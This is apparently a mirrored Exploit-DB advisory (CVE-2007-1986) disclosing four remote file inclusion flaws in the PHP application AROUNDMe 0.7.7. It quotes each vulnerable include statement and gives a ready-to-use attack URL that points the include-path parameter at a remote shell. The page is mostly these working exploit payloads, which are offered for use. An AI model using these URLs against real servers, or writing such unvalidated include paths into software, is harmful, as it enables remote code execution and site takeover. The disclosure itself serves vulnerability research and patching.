- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3659
- Проверка EDB
-
- Пройдено
- Автор
- KEZZAP66345
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-1986
- Дата публикации
- 2007-04-04
Код:
AROUNDMe _0_7_7
*****************
Found by kezzap66345 *
*****************
*****************
Script
Download:http://download.savannah.gnu.org/releases/aroundme/aroundme_0_7_7.tar.gz
*****************
*****************
ERROR#1:
File:\components\core\inc\core_profile.header.php
*****************
include_once($language_path_core . 'inc/me_common.inc.php'); <<< rfi coded
**************************************************************************************
RFI#1:
http://SITE.com/path/aroundme/components/core/inc/core_profile.header.php?language_path_core=[SHELL]
**************************************************************************************
*****************
ERROR#2:
File:/components/core/template/barnraiser_01/maint_contact_view.tpl.php
*****************
<?php
include $template_path_core . "inc/comment.inc.php";
?> <<< rfi coded
**************************************************************************************
RFI#2:
http://SITE.com/path/components/core/template/barnraiser_01/maint_contact_view.tpl.php?template_path_core=[SHELL]
ERROR#3:
File:/components/core/template/barnraiser_01/default.tpl.php
*****************
include_once($template_path . "inc/menu_" . $section . ".inc.php"); <<< rfi coded
**************************************************************************************
RFI#3:
http://SITE.com/path/components/core/template/barnraiser_01/default.tpl.php?template_path=[SHELL]
**************************************************************************************
*****************
ERROR#4:
File:/components/core/template/barnraiser_01/maint_contact_view.tpl.php
*****************
include($template_path_core . "inc/form_gui_html_editor.inc.php"); <<<
rfi coded
**************************************************************************************
RFI#4:
http://SITE.com/path/components/core/template/barnraiser_01/maint_contact_view.tpl.php?template_path_core=[SHELL]
Thanks:Siircicocuk and x0r0n
**************************************************************************************
**************************************************************************************
**************************************************************************************
**************************************************************************************
******Thanx****SiiRCiCOCUK****str0ke**************************************************
# milw0rm.com [2007-04-04]- Источник
- www.exploit-db.com
